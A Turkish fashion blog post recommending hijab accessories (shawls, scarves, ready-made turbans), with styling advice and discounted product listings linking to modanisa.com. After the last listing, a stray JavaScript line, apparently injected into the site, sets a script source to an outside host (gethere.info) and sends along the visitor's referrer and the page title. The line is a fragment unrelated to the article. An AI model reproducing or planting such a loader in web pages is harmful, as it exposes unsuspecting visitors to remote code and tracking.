Tesettür Aksesuarları

Son zamanlarda tesettürlü kadınlar kendilerine daha fazla özen göstermeye başladı. Bununla birlikte tesettürlülere özel aksesuarlarda arttı. Eşarp ve başörtülerine göre boneler, şallar, hazır türbanlar ve kolluklar… Şallar eskiden kadınların sadece boyunlarını süslerken artık tesettürlü kadınlarında işine yaramaya başladı. Hatta tesettür giyim için özel olarak çıkan düz renk, çiçek desenli, güpürlü, dantelli bir çok modeli bulunmaktadır.

Bonjela Güpürlü Şal

49,90 TL34,90 TL

modanisa.com'dan satın al

Lumire Lila Pembe Düz Renkli Şal

39,90 TL24,90 TL

modanisa.com'dan satın al

Şallar kadınları ne kadar hanım hanımcık yapıyorsa, eşarp ve başörtüler de o kadar asil gösteriyor. giyeceğiniz pardesülerle uzun parçalarla kombin yaptığınız zaman giyiminize daha çok uyacaktır. Renkli bir eşarp kullanacaksanız eşarbın içinde ki baskın renklerle üzerinize giyeceğiniz tunik veya pantolonun o renkte olmasına özen göstermelisiniz. Aksi takdirde birbirinden ayrı, uyumsuz giyinmiş gibi görünebilirsiniz. Tamamı desenli başörtülerin yanında şuan da boyun kısmı desenli üst kısmı düz renk olan eşarplar daha çok tercih edilmektedir. Bu tarzda olan eşarplarla sade şıklığı yakalayabilirsiniz.

Özsoy Kenarı Çiçek Desenli Fuşya Eşarp

24,90 TL14,90 TL

modanisa.com'dan satın al

Gülsoy Halka Desenli Eşarp

29,90 TL14,90 TL

modanisa.com'dan satın al

Hazır türbanlar tesettürlü kadınlar için çok pratik bir yöntem olmakla birlikte çokta kullanışlıdır. türbanlarını istediği gibi bağlayamayanlar veya sürekli kaymasından ve saçlarının çıkmasından dolayı sıkıntılar yaşayan kadınlar için adeta müthiş bir buluş. Her zaman şık olmayı isteyen bayanlar sık sık bu ürünleri tercih etmektedirler.Düğünlerde ve özel davetlerde kuaförlere yüksek meblağlar ödemeden evde beş dakika içinde hazır türban kullanarak kolaylıkla hazırlanabilirsiniz. Taşlı modelleri özellikle davetler için vazgeçilmez türden.

Zehrace Hazır Kahve Türban

59,90 TL35,00 TL

modanisa.com'dan satın al

Zehrace Taş Süslemeli Pudra Hazır Türban

65,00 TL

modanisa.com'dan satın al

Zehrace Şapkalı Bordo Hazır Türban

55,00 TL

modanisa.com'dan satın al
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

4656 Toplam 2 Bugün
Yazar: Melek Yavuz

Modayı seviyorum ve yakından takip ediyorum. İnsanların vücut tiplerini tanıyarak giyinmesi için tavsiyelerde bulunuyorum.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Şu HTML etiketlerini ve özelliklerini kullanabilirsiniz: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>